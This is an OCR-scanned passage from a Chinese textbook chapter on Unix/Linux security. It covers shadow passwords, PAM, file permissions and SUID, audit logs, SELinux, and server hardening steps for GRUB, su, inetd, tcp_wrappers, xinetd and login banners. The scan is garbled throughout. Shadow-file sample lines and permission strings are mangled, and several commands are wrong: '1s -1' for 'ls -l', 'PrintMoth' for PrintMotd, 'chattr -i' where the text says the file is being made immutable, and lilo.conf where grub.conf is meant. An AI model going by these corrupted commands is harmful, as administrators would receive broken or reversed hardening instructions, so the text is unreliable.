其 shell， 或 例子 中 的 /sbin/nologin。 

2) ”shadow 口令 验证 

现在 的 Unix/Linux 系统 中 ， 口 令 不 再 直接 保存 在 passwd 文件 中 ， 通 常 将 passwd 文件 
中 的 口令 字段 使 用 一 个 “x” 来 代替 ， 将 /etc/shadow 作为 真正 的 口令 文件 ， 该 文件 主要 用 
于 保存 与 用 户口 令 相关 的 信息 ， 内 容 如 下 所 示 : 


root:$1$NAHOP6DK$HShh3mMCmJiEOOWR6c2Tu.:15258:0:99999:7::: 
Dins*s152580:079999095 T7535. 

daemon:*:15258:0:99999:7::: 

adm:*:15258:0:99999:7::: 

Lp:*15250505999995 7 

SYnc:*:15258s0990099: 7223 

shutdown:*:15258:0:99999:7::: 
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alt>* L2500999099: 7 

ED 5250 09909097: 

S123:$1$BNGOJGF1$sFOmwTEdhCwox4SAbGXN61:15260:0:99999:7::: 

文件 中 每 个 账户 信息 占 一 行 ， 每 一 行 与 passwd 文件 中 的 相应 行 对 应 。 每 行 9 个 域 ， 
分 别 是 : 

(1) 注册 名 : 与 passwd 文件 中 对 应 。 

(2) 密码 : 加密 后 的 密码 ， 字 符 “*” 表 示 该 账号 不 能 用 来 登录 。 

(3) 最 后 一 次 修改 密码 的 日 期 。 

(4) 密码 不 可 被 变更 的 天 数 。 

(5) 密码 需要 被 重新 设置 的 天 数 : 99999 表示 不 需要 变更 。 

(6) 密码 变更 前 提前 几 天 警告 。 

(7) 账号 失效 日 期 。 

(8) 账号 取消 日 期 。 

(9) 保留 条 目 : 目前 没 用 。 

只 有 系统 管理 员 才 有 权限 对 shadow 文件 进行 查看 和 修改 。 

3) ”PAM 安全 验证 

PAM(Pluggable Authentication Modules) 是 一 套 共 享 库 ， 其 目的 是 提供 一 个 框架 和 一 套 
编程 接口 ， 将 认证 工作 由 程序 员 交 给 管理 员 。 如 果 编 程 时 选择 了 PAM 库 支 持 ， 则 程序 运 
行 时 ，PAM 根据 当前 管理 员 的 设 定 进行 具体 的 验证 过 程 ， 整 个 过 程 中 可 以 添加 或 删除 特 
定 的 功能 ， 从 系统 核心 中 分 离 出 来 。PAM 能 够 改变 本 地 认证 方法 而 不 需要 重新 编译 与 认 
证 相关 的 应 用 程序 。PAM 的 功能 包括 

@ ”加 密 口令 (包括 DES 以 外 的 算法 ); 
对 用 户 进行 资源 限制 ， 防 止 DOS 攻击 ; 
允许 随意 Shadow 口令 ; 
限制 特定 用 户 在 指定 时 间 从 指定 地 点 登录 ; 
引入 “client plug-in agents” 的 概念 ， 使 PAM 支持 C/S 应 用 中 的 机 器 一 机 器 认 
证 成 为 可 能 。 

PAM 为 更 有 效 的 认证 方法 的 开发 提供 了 便利 ， 在 此 基础 上 可 以 很 容易 地 开发 出 替代 
常规 用 户 名 加 口令 的 认证 方法 ， 如 智能 卡 、 指 纹 识别 等 认证 方法 。 


2. 文件 系统 权限 


在 Unix/Linux 系统 中 ， 所 有 的 对 象 都 是 以 文件 形式 存在 的 。 最 基本 的 文件 类 型 有 正 
规 文件 、 特 殊 文 件 、 目 录 、 链 接 、 套 接 字 和 字符 设备 等 ， 这 些 文件 以 一 个 分 层 的 树 形 结构 
进行 组 织 ， 以 root 目录 为 起 点 ， 组 成 一 个 文件 系统 。 因 此 ， 文 件 系统 安全 是 操作 系统 安全 
最 重要 的 部 分 。 

1) ”文件 权限 

文件 系统 的 安全 主要 通过 设置 文件 的 权限 来 实现 。Unix/Linux 系统 的 每 一 个 文件 都 有 
一 系列 控制 信息 来 决定 不 同 的 用 户 对 该 文件 的 访问 权限 ， 权 限 由 4 个 八进制 位 组 成 ， 如 
4754、2755 等 ， 一 般 文件 第 一 个 八进制 位 为 0， 可 以 省 略 ， 变 成 754、755 等 。 格 式 
如 下 : 
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U [ed 下 RWX RWX Ri 
SUID 位 SGID 位 粘着 位 用 户 权限 同 组 用 户 权 限 ”其 他 用 户 权 限 

第 一 个 八进制 数 是 调整 uid 位 、 调 整 gid 位 和 粘着 位 ， 后 面 三 个 八进制 数 分 别 表 示 文 
件 所 有 者 权限 ， 同 组 用 户 权 限 和 其 他 用 户 组 的 用 户 权限 。 下 面 是 ls -1 命令 输出 的 结果 : 


drwxr-xr-x 14 root root 4096 Mar 5 14:50 log 

lrwxrwxrwx root root 10 Oct 12 01:37 mail -> spool/mail 

drwxr-xr-x 2 root root 4096 Feb 17 2010 nis 

drwxr-xr-x 2 root root 4096 Feb 17 2010 opt 

drwxr-xr-x 19 root root 4096 Mar 5 15:45 run 

brw-r-—-—-—— 1 root disk bE 0 Mar 5 13:43 ram0 

Crw-rw-rw- 1 root tty Si 0 Mar 5 13:43 tty 

左边 列 出 了 文件 的 访问 权限 ， 第 一 位 的 含义 如 下 : 

-: 表示 该 文件 为 普通 文件 。 

d: 表示 为 目录 。 

1: 表示 该 文件 为 链接 文件 。 

p: 先进 先 出 的 特别 文件 。 

b: 块 设备 文件 。 

c: 字符 设备 文件 。 

系统 提供 了 几 个 命令 ， 用 于 专门 处 理 文件 、 目 录 的 所 属 关系 和 访问 权限 的 管理 。 

chown: 改变 文件 的 所 有 者 。 如 chown lili testl ， 把 testl 文件 的 所 有 者 改 为 lili。 

chgrp: 改变 文件 的 所 属 组 。 

chmod: 改变 文件 的 访问 权限 。 如 chmod 755 testl ， 命 令 执行 后 ， 用 ls -1 输出 结果 
如 下 : 


-IrWXr-xr-x 1 root root 6 Mar 6 09:52 testl 


2) ”特权 文件 

首先 介绍 两 个 概念 : 实际 用 户 ID 和 有 效用 户 ID。 实 际 用户 ID 是 用 户 登录 过 程 中 建 
立 的 用 户 ID; 有 效用 户 ID 是 用 户 运行 进程 时 的 有 效 权限 。 对 于 一 般 文件 ， 实 际 ID 和 有 
效 ID 是 相同 的 。 如 果 设 置 了 SUID 和 SGID 位 ， 情 况 就 不 同 了 。 

SUID: 文件 被 设置 该 位 后 ， 普 通用 户 在 该 文件 执行 阶段 具有 文件 所 有 者 的 权限 。 即 
实际 ID 是 文件 所 有 者 。 典 型 的 文件 是 /usr/bin/passwd， 如 果 一 般 用 户 执 行 该 文件 ， 在 执行 
过 程 中 可 以 获得 root 权限 ， 从 而 获取 用 户 信息 。 

SGID: 文件 被 设置 该 位 后 ， 其 他 用 户 在 该 文件 执行 阶段 ， 具 有 和 该 文件 所 属 组 的 其 
他 用 户 相同 的 权限 ， 即 有 效用 户 组 为 文件 所 有 者 用 户 组 。 这 个 范围 比较 小 ， 只 具有 组 成 员 
的 权限 。 因 此 ， 在 设置 权限 时 ， 能 用 SGID 的 尽量 不 要 用 SUID， 安 全 性 相对 高 一 些 。 

除 文件 外 ，SGID 也 可 以 用 在 目录 上 。 当 目录 设置 了 该 位 后 ， 如 果 用 户 对 此 目录 具有 
r 和 x 的 权限 ， 用 户 可 以 进入 此 目录 ， 且 在 此 目录 下 具有 目录 所 在 组 权限 ， 即 有 效用 户 组 
变 成 该 目录 的 用 户 组 ; 如 果 用 户 对 目录 具有 w 权限 ， 则 用 户 创建 文件 的 用 户 组 继承 目录 
的 用 户 组 。 

粘着 位 (SBIT): 目录 设置 该 位 后 ， 用 户 可 以 在 目录 下 创建 文件 ， 但 是 不 能 删除 文件 
(自己 创建 的 除外 )。 


Pn 
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命令 “chmod” 可 以 设置 以 下 标识 。 
@ chmod uts test: 为 test 文件 加 上 SUID 标志 ， 也 可 以 把 代表 权限 的 4 个 八进制 
位 中 的 第 一 个 设置 为 “4”。 

@ chmod gts test; 为 test 文件 加 上 SGID 标志 ， 也 可 把 权限 的 第 一 位 设置 为 “2”。 

@ ”chmod otttestdir: 为 testdir 目录 加 上 SBIT 标志 ， 也 可 把 权限 的 第 一 位 设置 为 “1”。 

设置 完成 后 ， 可 以 用 ls -1 进行 查看 ， 如 果 有 这 些 标志 ， 会 在 原来 执行 标志 位 “x” 的 
位 置 上 显示 ， 如 下 : 

—IWXIW-—r—— 表示 有 SUID 标志 

-rwxrwxrw- ”表示 有 SGID 标志 

-rwxrw-rwt ”表示 有 SBIT 标志 

至 于 原来 的 执行 标志 “x” 如 何 显示 问题 ， 系 统 这 样 规定 ， 如 果 本 来 在 该 位 上 有 
“x”， 则 这 些 标志 显示 为 小 写字 母 (ss.D， 和 否则 显示 为 大 写字 母 (S.S.T)。 

SUID 和 SGID 直接 关系 到 文件 系统 的 安全 问题 ， 因 此 管理 员 不 能 随意 赋予 可 行 性 文 
件 SUID 和 SGIE 特性 。 另 外 ， 还 要 时 常 查看 系统 中 有 哪些 文件 被 赋予 了 这 两 种 特性 ， 可 
以 用 以 下 命令 来 实现 : 


# 1s -1 /bin | grep '^..s' 查找 /bin 目录 下 的 SUID 文 件 
# 1s -1 /sbin | grep '*....s' 查找 /sbin 目录 下 的 SGID 文件 
3. 文件 加 密 


正确 的 文件 权限 能 限制 非法 用 户 对 文件 的 访问 ， 但 不 能 排除 某 些 入 侵 者 的 恶意 攻击 ， 
尤其 是 对 特殊 文件 的 读 取 。 文 件 加 密 机 制 可 以 有 效 防止 文件 信息 及 数据 被 窃取 ， 同 时 可 以 
防止 未 授权 的 访问 、 防 止 信息 的 不 完整 等 。 

Linux 有 多 重文 件 加 密 系统 ， 如 CFS、TCFS、CRYPTFS 等 ， 有 代表 性 的 是 
TCFS(Transparent Cryptographic File System， 透 明 加 密 文件 系统 )。TCFS 通过 将 加 密 服 务 
和 文件 系统 紧密 结合 ， 使 用 户 感觉 不 到 文件 的 加 密 过 程 。TCFS 不 修改 文件 系统 的 数据 结 
构 ， 备 份 与 修复 以 及 用 户 访问 保密 文件 的 语义 也 不 变 。TCFS 能 够 做 到 让 保密 文件 对 以 下 
用 户 不 可 读 : 

@ ”合法 拥有 者 以 外 的 用 户 ; 

@ ”用 户 和 远程 文件 系统 通信 线路 上 的 窃听 者 ; 

@ ”文件 系统 服务 器 的 超级 用 户 。 

对 于 合法 用 户 ， 访 问 保密 文件 与 访问 普通 文件 几乎 没有 区 别 。 


4. 安全 审计 


即便 系统 采取 了 多 种 安全 措施 ， 系 统 也 不 是 牢 不 可 破 的 ， 攻 击 者 总 是 想 尽 办 法 攻击 计 
算 机 ， 入 侵 系 统 ， 因 此 有 必要 对 用 户 的 操作 和 行为 进行 记录 。Unix/Linux 提供 安全 审计 功 
攻 ， 它 对 网 络 安全 进行 检测 ， 利 用 系统 日 志 记录 攻击 者 的 行踪 ， 提 供 攻 击发 生 的 真实 证 
据 。 在 检查 网 络 入 侵 行为 时 ， 日 志 信息 是 必 不 可 少 的 。 

日 志 记录 系统 和 用 户 的 所 有 行为 ， 包 括 用 户 登 录 的 时 间 、 执 行 的 命令 、 访 问 的 文件 、 
系统 运行 过 程 中 发 生 了 哪些 错误 等 。 在 标准 Unix/Linux 系统 中 ， 操 作 系统 维护 三 种 基本 
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日 志 : 连接 时 间 日 志 、 进 程 监控 日 志 、 系 统 和 服务 日 志 。 

@ ”连接 时 间 日 志 : 记录 用 户 的 登录 信息 ， 包 括 登 录 时 间 、 登 录 他 、 在 线 时 间 等 信 
息 。 连 接 日 志 一 般 由 /varlog/wtmp 和 /var/run/utmp 这 两 个 文件 记录 。 

e@ ”进程 监控 日 志 : 用 来 记录 系统 执行 的 进程 信息 ， 如 某 进 程 消耗 了 多 少 CPU 时 
间 。 进 程 监控 日 志 在 监控 用 户 的 操作 指令 时 非常 有 效 。 当 服务 器 出 现 经 常 无 故 关 
机 或 者 无 故 被 人 删除 文件 等 现象 时 ， 可 以 通过 进程 监控 日 志 进 行 检查 。 

@ ”系统 和 服务 日 志 : 该 日 志 不 由 系统 内 核 维护 ， 而 是 由 syslogd 或 者 其 他 一 些 相关 
程序 完成 。 如 /var/log 目录 下 的 lastlog、secure、 及 btmp 等 都 是 由 syslogd 日 志 服 
务 驱 动 的 。 

随 着 时 间 和 访问 量 的 增加 ， 日 志文 件 也 会 越 来 越 大 ， 为 了 避免 对 系统 性 能 造成 影响 ， 

Unix/Linux 系统 还 提供 了 日 志 转 储 功能 。 如 在 Linux 中 使 用 logrotate 工具 ， 并 结合 cron 任 
务 计 划 ， 可 以 轻松 实现 日 志文 件 的 转 储 。 


5. 强制 访问 控制 


强制 访问 控制 (Mandatory Access Control，MAC) 是 一 种 由 系统 管理 员 从 全 系统 的 角度 
定义 和 实施 的 访问 控制 。 它 通过 标记 系统 中 的 主客 体 ， 强 制 性 地 限制 信息 的 共享 和 流动 ， 
使 不 同 的 用 户 只 能 访问 到 与 其 有 关 的 、 指 定 范 围 内 的 信息 ， 可 从 根本 上 防止 信息 的 失 泄密 
和 访问 混乱 的 现象 。 

传统 的 MAC 实现 都 是 基于 TCSEC 中 定义 的 MLS 策略 ， 但 MLS 本 身 存 在 着 不 灵 
活 、 兼 容 性 差 、 难 于 管理 等 缺点 。 后 来 又 提出 了 多 种 MAC 策略 ， 如 DTE、RBAC、 
SElinux、RSBAC、MAC 等 ， 比 较 典 型 的 有 SElinux、RSBAC。 

NSA 推出 的 SELinux 安全 体系 结构 称 为 Flask， 在 这 一 结构 中 ， 安 全 性 策略 的 逻辑 和 
通用 接口 一 起 封装 在 与 操作 系统 独立 的 组 件 中 ， 这 个 单独 的 组 件 称 为 安全 服务 器 。 
SELinux 的 安全 服务 器 定义 了 一 种 混合 的 安全 性 策略 ， 由 类 型 实施 (TE)、 基 于 角色 的 访问 
控制 (RBAC) 和 多 级 安全 (MLS) 组 成 。 通 过 替换 安全 服务 器 ， 可 以 支持 不 同 的 安全 策略 。 
SELinux 使 用 策略 配置 语言 定义 安全 策略 ， 然 后 通过 checkpolicy 编译 成 二 进 制 形式 ， 存 储 
在 文件 /ss_policy 中 ， 在 内 核 引导 时 读 到 内 核 空间 。 这 意味 着 安全 性 策略 在 每 次 系统 引导 
时 都 会 有 所 不 同 。 策 略 甚至 可 以 通过 使 用 security load_policy 接口 在 系统 操作 期 间 更 改 
(只 要 将 策略 配置 成 允许 这 样 的 更 改 )。 

RSBAC 的 全 称 是 Rule Set Based Access Control( 基 于 规则 集 的 访问 控制 )， 它 是 根据 
Abrams 和 LaPadula 提出 的 Generalized Framework for Access Control(GFAC) 模 型 开发 的 ， 
可 以 基于 多 个 模块 ， 提 供 灵 活 的 访问 控制 。 所 有 与 安全 相关 的 系统 调用 都 扩展 了 安全 实施 
代码 ， 这 些 代 码 调用 中 央 决 策 部 件 ， 该 部 件 随后 调用 所 有 激活 的 决策 模块 ， 形 成 一 个 综合 
的 决定 ， 然 后 由 系统 调用 扩展 来 实施 这 个 决定 。RSBAC 目前 包含 的 模块 主要 有 MAC、 
RBAC、ACL 等 。 


4.3.2 Unix/Linux 系统 安全 配置 


为 保障 操作 系统 安全 ， 在 系统 进行 安装 和 维护 的 过 程 中 ， 要 把 安全 性 问题 放 在 重要 的 
位 置 。 尤 其 是 Unix 作为 成 熟 的 商用 网 络 操作 系统 ， 广 泛 地 应 用 在 金融 、 报 销 、 电 力 等 行 
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业 ， 人 性 能 稳定 ， 安 全 可 靠 。 但 是 如 果 用 户 没有 对 系统 进行 正确 的 配置 ， 就 会 给 入 侵 者 以 可 
乘 之 机 。 因 此 安全 配置 是 网 络 操作 系统 安全 的 基础 。 


1. 安装 时 的 安全 措施 和 设置 


系统 的 安装 应 该 在 隔离 网 络 的 环境 下 进行 ， 选 择 custom 方式 安装 需要 的 软件 包 。 

在 选择 分 区 时 要 注意 ， 如 果 用 root 分 区 记录 数据 ， 如 log 文件 、email 等 ， 就 可 能 因 
为 拒绝 服务 产生 大 量 日 志 或 垃圾 邮件 ， 导 致 系统 崩溃 。 所 以 建议 为 /var 开辟 单独 的 分 区 ， 
用 来 存放 日 志和 邮件 ， 避 免 root 分 区 溢出 带 来 的 危害 。 

另外 ， 一 般 服 务 器 都 有 专门 的 应 用 ， 应 该 为 专门 的 应 用 开辟 单独 分 区 。 如 果 数 据 量 特 
别 大 还 可 以 单独 开辟 数据 分 区 ， 如 /data， 然 后 用 链接 文件 的 方式 相关 联 。 比 如 邮件 服务 器 
安装 时 可 以 创建 以 下 分 区 : 

/root 

/var: 邮件 系统 安装 分 区 

/data: 邮件 系统 中 用 户 邮件 存放 位 置 

Swap: 交换 分 区 

/home: 普通 用 户 

如 果 用 户 数 据 比 较 多 ， 建 议 为 /home 单独 分 一 个 区 ， 避 免 用 户 无 意识 或 误 操 作 填 满 
分 区 。 

系统 安装 成 功 后 ， 要 及 时 的 为 系统 打上 安全 补丁 ， 这 是 预防 漏洞 攻击 的 第 一 步 。 


2. BIOS 安全 


如 果 入 侵 者 在 服务 器 的 BIOS 中 改变 启动 顺序 ， 比 如 从 U 盘 中 启动 系统 ， 就 很 容易 读 
取 、 修 改 ， 甚 至 销毁 硬盘 中 的 数据 ， 造 成 严重 的 后 果 。 因 此 一 定 要 给 BIOS 设置 密码 ， 阻 
止 别人 进入 其 中 修改 配置 。 


3. 引导 程序 安全 


引导 程序 驻 留 在 磁盘 的 第 一 个 扇 区 。 启 动 过 程 中 系统 自 检 后 ，BIOS 将 控制 权 交 给 引 
导 程 序 ， 它 允许 选择 引导 计算 机 的 操作 系统 。 比 较 典 型 的 引导 程序 有 GNU GRUB 和 
Lilo。 
引导 程序 是 系统 非常 重要 的 关键 文件 ， 如 果 有 人 对 其 进行 了 恶意 修改 ， 会 给 系统 带 来 
灾难 性 的 后 果 。 可 以 使 用 如 下 设置 来 保护 引导 程序 的 运行 和 访问 (以 Lilo 为 例 ): 
(1) 编辑 /etc/grub.conf 文件 ， 加 入 参数 password， 设 置 全 局 和 局 部 密码 ， 使 系统 在 启 
动 时 要 求 密码 验证 。 如 下 所 示 : 
default=0 
timeout=5 ， # 等 待 选 择 时 间 ， 可 以 把 数值 设置 得 大 一 点 
password 123456 # 全 局 密码 
splashimage= (hd0, 0) /grub/splash.xpm.gz 
hiddenmenu 
title Enterprise Linux (2.6.18-194.e15) 
root (hd0,0) 
password 123456 # 局 部 密码 


kernel /vmlinuz-2.6.18-194.el5 ro root=/dev/VolGroup00/LogVol100 rhgb quiet 
initrd /initrd-2.6.18-194.e15.img 
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密码 也 可 以 选择 MD5 加 密 方式 ， 设 置 方 法 是 : password -md5 < 加 密 后 密码 >。 
(2) 权限 设置 : 设置 grub.conf 文件 的 权限 为 仅 root 用 户 读 取 。 

# chmod 600 /etc/lilo.conf 

(3) 使 srub.conf 文件 变 为 不 可 更 改 。 

# chattr +i /etc/grub.conf 


按 以 上 方式 设置 后 ， 可 以 防止 其 他 用 户 对 /etc/grub.conf 文件 有 意 或 无 意 的 改变 ， 保 护 
系统 安全 。 


4. 删除 特殊 账户 

Unix/Linux 系统 中 存在 大 量 系统 用 户 和 用 户 组 ， 有 些 可 能 永远 也 用 不 到 ， 比 如 Ip、 
sync、uucp、news、ftp 等 。 对 于 有 些 账号 系统 采取 了 不 允许 登录 的 措施 ， 但 是 最 安全 的 
方法 是 将 其 删除 ， 以 绝 后 患 。 删 除 用户 的 命令 如 下 ; 


# userdel ftp 


删除 用 户 组 的 命令 如 下 : 


# groupdel ftp 


5. 自动 注销 用 户 


如 果 用 户 ， 尤 其 对 于 root 用 户 ， 离 开 系统 的 时 间 比 较 长 ， 或 忘记 注销 账号 ， 会 给 入 侵 
者 以 可 乘 之 机 。 可 以 设置 系统 一 段 时间 无 操作 自动 注销 ， 来 保护 系统 安全 。 

参数 TMOUT 可 以 实现 自动 注销 功能 ，TMOUT 的 单位 是 秒 。 对 于 root 用 户 ， 可 以 通 
过 修改 /etc/profile 文件 进行 设置 。 普 通用 户 是 在 用 户 目录 下 的 .bashrc 文件 中 设置 。 如 下 
所 示 : 

TMOUT=1800 


1800 即 半 小 时 ， 登 录 系 统 中 的 用 户 如 果 半 小 时 内 无 操作 ， 则 自动 注销 。 该 项 设置 
后 ， 对 于 当前 会 话 无 效 ， 用 户 下 次 登录 时 才 起 作用 。 

6. 普通 用 户 的 访问 限制 

1) “文件 和 控制 台 限制 

对 于 系统 中 的 普通 用 户 ， 可 以 用 设置 权限 的 方式 限制 其 对 某 些 系统 关键 文件 和 特定 文 
件 的 访问 ， 只 给 用 户 能 完成 工作 的 最 小 权限 。 如 取消 用 户 对 /etc/re.d/init.d 目录 下 script 文 
件 的 所 有 权限 ， 该 目录 下 存放 的 是 执行 或 关闭 启动 时 系统 执行 的 脚本 文件 。 

# chmod -R 700 /etc/rc.d/init.d/* 

还 可 以 通过 文件 免疫 方式 ， 保 护 文件 安全 。 

# chattr +i /etc/services 

除非 root 用 户 取 消 该 设置 ， 否 则 不 允许 普通 用 户 修改 和 删除 该 文件 。 

另外 ， 还 应 该 取消 普通 用 户 使 用 某 些 关 键 命令 的 权限 ， 如 有 关 控 制 台 控制 的 命令 : 


shutdown、reboot、halt 等 。 
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# rm -f /etc/security/console.apps/ 


后 面 加 要 注销 的 程序 名 。 

2) “键盘 关闭 命令 限制 

应 该 禁止 普通 用 户 使 用 Control-Alt-Delete 键盘 关闭 命令 ， 在 /etc/inittab 文件 中 注释 掉 
下 面 的 行 : 


#ca: : ctrlaltdel: /sbin/shutdown -t3 - 工 now 


保存 退出 。 使 用 /sbin/init q 命令 使 配置 生效 。 

3) ”SU 访问 限制 

普通 用 户 可 以 使 用 su(Substitute User， 蔡 代用 户 ) 命 令 改变 为 其 他 用 户 ， 如 root 用 户 。 
如 果 不 希 望 任 何人 通过 su 命令 改变 为 root 用 户 ， 可 以 限制 某 些 用 户 使 用 su 命令 。 

在 su 的 配置 文件 /etc/pam.d/su 中 ， 增 加 如 下 两 行 : 


auth sufficient Pam_rootok.so debug 
auth required Pam wheel.so group=wheel 


通过 以 上 设置 ， 系 统 只 允许 wheel 组 成 员 使 用 su 命令 成 为 root 用 户 。 可 以 把 需要 的 
用 户 加 到 wheel 组 中 ， 使 其 拥有 该 权限 。 


7. root 用 户 限制 


1) “登录 限制 

Unix/Linux 系统 中 root 用 户 拥有 最 高 的 权限 ，root 账号 的 使 用 安全 直接 关系 到 操作 系 
统 的 安全 ， 可 以 对 root 账号 的 登录 控制 台 进 行 限制 ， 以 保护 其 安全 性 。 在 /etc/securetty 文 
件 中 可 以 定义 允许 root 用 户 登 录 的 TTY 设备 ， 该 文件 中 列 出 了 所 有 的 TTY 设备 ， 在 不 允 
许 登 录 的 设备 前 面 加 上 “#”， 注 释 掉 。 

在 Unix/Linux 系统 中 ， 用 户 可 以 通过 SSH 进行 安全 连接 ， 在 SSH 的 远程 连接 时 ， 可 
以 禁止 root 用 户 远程 登录 。 修 改 /etc/ssh/sshd_config 文件 ， 把 


#PermitRootLogin yes 


修改 为 : 


PermitRootLogin no 


2) ”使 用 sudo 

sudo 可 以 对 root 权限 进行 控制 和 审计 ， 以 加 固 操 作 系 统 的 安全 性 。sudo 在 保证 用 户 
正常 工作 的 前 提 下 ， 尽 可 能 压缩 授予 用 户 的 权限 。 它 可 以 让 指定 用 户 作 为 root 用 户 或 用 户 
组 来 运行 某 些 命令 ， 还 将 指定 用 户 使 用 的 命令 和 参数 作 详 细 记 录 。 


8. 关闭 不 需要 的 服务 

在 Unix 系统 和 以 前 版 本 的 Linux 系统 中 ， 系 统 启动 时 运行 inetd 进程 ， 它 是 一 个 监视 
网 络 进程 的 守护 进程 。inetd 监听 一 些 网 络 端口 ， 当 有 服务 请 求 时 ，inetd 响应 请 求 并 调用 
相应 的 服务 进程 来 处 理 。inetd 实际 上 是 一 个 服务 连接 管理 ， 使 用 它 来 运行 一 些 简单 的 服 
务 可 以 减少 系统 的 负载 。 在 具体 实施 中 ， 如 果 考 虑 到 系统 安全 ， 还 可 以 停 掉 某 些 系统 不 用 
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的 服务 如 telnet、exec、finger 等 。 文 件 inetd.conf 是 inetd 的 配置 文件 ， 为 保护 系统 安全 可 
对 inetd.conf 作 如 下 设置 : 
(1) 只 允许 root 用 户 读 写 该 文件 。 


# chmod 600 /etc/inetd.conf 


(2) 确保 /etc/inetd.conf 文件 的 所 有 者 是 root。 

(3) 编辑 inetd.conf 文件 (vi /etc/inetd.conf)， 关 闭 不 需要 的 服务 ， 如 ftp、telnet、 
shell、login、exec、talk、ntalk、imap、pop -2、pop -3、finger、auth 等 ， 方 法 是 在 相应 位 
置 加 “#”， 如 下 所 示 : 


#ftp 21/tcp 

#ftp 21/udp fsp fspd 

ssh 22/tcp # SSH Remote Login Protocol 
ssh 22/udp # SSH Remote Login Protocol 
#telnet 23/tcp 

#telnet 23/udp 


# killall -HUP inetd 


(5) 设置 inetd.conf 文 件 为 不 可 修改 。 


# chattr -i /etc/inetd.conf 
只 有 root 用 户 才能 取消 这 一 属性 。 
9. tcp_wrappers 


tcp_wrappers 为 由 inetd 生成 的 服务 提供 增强 的 安全 性 。 它 使 用 访问 控制 列表 (ACL)， 
提供 防止 主机 名 和 主机 地 址 欺骗 的 保护 。 

tcp_wrappers 的 配置 文件 在 /etc 目录 下 ， 有 两 个 : hostdeny 和 host.allow， 两 个 文件 结 
合 ， 配 置 对 服务 的 访问 控制 。 

(1) 编辑 host.deny 文件 ， 拒 绝 所 有 连接 。 


#Deny access toeveryone 
ALL: ALL@ALL, PARANOID 


(2) 编辑 host.allow， 加 入 允许 访问 的 主机 列表 。 
ssh: 192.168.5.188 1ili.cn 


192.168.5.188 和 lili.cn 是 允许 访问 ssh 服务 的 他 地址 和 主机 名 。 

(3) tcpdchk 程序 用 来 检查 tcp_wrappers 设置 ， 并 报告 发 现 的 潜在 的 和 真实 的 问题 。 
设置 完 后 运行 如 下 命令 : 

# tcpdchk 


10. Xinetd 
在 后 来 的 Linux 版 本 和 某 些 Unix 版 本 中 ，xinetd 代替 了 inetd。 实 际 上 ，xinetd 提供 类 
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似 于 inetd + tcp_wrappers 的 功能 ， 但 是 更 加 强大 和 安全 。services 文件 中 列 出 了 系统 提供 
的 一 些 服务 ， 文 件 xinetd.conf 中 提供 对 相应 服务 的 配置 。xinetd 提供 的 安全 功能 有 : 


支持 对 tcp、udp 和 rpc 服务 。 

支持 基于 时 间 段 的 访问 控制 ， 同 时 ， 能 限制 启动 的 所 有 服务 器 数目 ， 限 制 同时 运 
行 的 同一 类 型 的 服务 器 数目 。 

将 某 个 服务 绑 定 在 特定 的 系统 接口 上 ， 从 而 能 实现 只 允许 私有 网 络 访问 某 项 
服务 。 

有 效 防 止 DoS 攻击 。 

功能 完备 的 log 功能 ， 即 可 以 记录 连接 成 功 也 可 以 记录 连接 失败 的 行为 ， 还 能 限 
制 日 志文 件 (/var/adm/xinetd.log) 的 大 小 。 


在 xinetd.conf 中 设置 的 服务 项 必须 在 /etc/services 中 列 出 ， 比 如 可 以 对 ssh 服务 做 如 下 


配置 


service ssh2 


{ 

socket type = stream 
protocol = tcp 

user = 1ili 

server = /usr/local/sbin/sshd2 
server args = -i 

log_on failure += USERID 
only from = 192.168.0.0 
no access = 192.168.62.0 
no access += 192.168.99.0 
} 


除了 默认 设置 外 ， 通 过 ssh 服务 访问 服务 器 需 满足 的 条 件 有 : 以 lili 用 户 运行 服务 ， 
连接 失败 时 登记 的 信息 中 UID 通过 RFC1314 调用 捕获 ， 只 有 192.168.0.0 网 段 可 以 使 用 
ssh 访问 服务 器 ， 但 192.168.62.0 段 和 192.168.99.0 段 除外 。 

如 果 想 要 关闭 某 项 服务 ， 只 需 在 相应 的 服务 下 面 设置 “disable=yes” 即 可 。 


11. 隐藏 系统 信息 暴露 


1) “本 地 用 户 
默认 情况 下 ， 登 录 到 Linux 系统 时 ， 会 显示 操作 系统 的 名 称 、 发 行 版 本 、 内 核 版 本 、 
服务 器 名 称 等 信息 。 对 于 入 侵 者 来 说 ， 这 些 信息 足够 用 来 入 侵 系统 了 。 因 此 应 该 屏蔽 这 些 


信息 ， 只 显示 “login: ”提示 符 。 

第 一 步 ， 编 辑 /etc/re.d/rc.local 文件 ， 把 登录 时 有 关 欢 迎 信息 的 设置 用 “#” 注 释 掉 。 
如 下 所 示 : 

# echo "" > /etc/issue 

# echo " $R" >> /etc/issue 

# echo "Kernel $ (uname -r) on $a $ (uname -m) " > > /etc/issue 

# cp -f /etc/issue /etc/issue.net 

# echo > > /etc/issue 


第 二 步 ， 删 除 /etc 目录 下 面 的 issue 和 issue net 文件 : 


# 


rm -f /etc/issue 
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# rm -f /etc/issue.net 


另外 ， 在 /etc/motd 文件 中 也 有 关于 登录 信息 的 设置 ， 在 相应 的 行 前 加 “#” 注 释 掉 。 

2) ”远程 访问 

当 用 户 远 程 登录 系统 时 ， 系 统 也 会 显示 包括 版 本 号 等 系统 信息 和 欢迎 信息 ， 如 果 不 想 
显示 这 些 信息 ， 可 以 通过 修改 /etc/inetd.conf 文件 来 达到 这 个 目的 。 

找到 “inetd.conf” 文 件 中 的 如 下 行 


telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd 
修改 为 : 
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -h 
“-h” 表 示 当 用 户 登录 时 只 显示 一 个 “login: ”提示 ， 而 不 显示 系统 欢迎 信息 。 
如 果 使 用 ssh 登录 ， 可 以 在 其 配置 文件 /etc/ssh/sshd_config 中 ， 找 到 : 


PrintMoth yes 


改 为 : 


PrintMoth no 
12. Shell logging 


使 用 bash shell 时 ， 在 用 户 个 人 目录 下 存在 一 个 .bash_history 文件 ， 该 文件 用 于 保存 用 
户 使 用 过 的 命令 。 管 理 员 可 以 通过 这 个 文件 查看 用 户 使 用 过 那些 命令 ， 但 同时 也 会 给 入 侵 
者 提供 方便 ， 因 此 ， 应 该 根据 实际 情况 对 该 文件 保存 的 命令 条 数 进行 合理 设置 。 

可 以 在 /etc/profile 文件 中 对 bash shell 保存 的 命令 条 数 进行 更 改 ， 在 该 文件 中 找到 如 
下 行 : 

HISTFILESIZE = 80 

HISTSIZE = 80 

表示 每 个 用 户 的 .bash_history 文件 只 可 以 保存 80 条 使 用 过 的 命令 。 

另外 ， 还 可 以 在 /etc/skel/.bash_logout 文件 中 添加 如 下 配置 
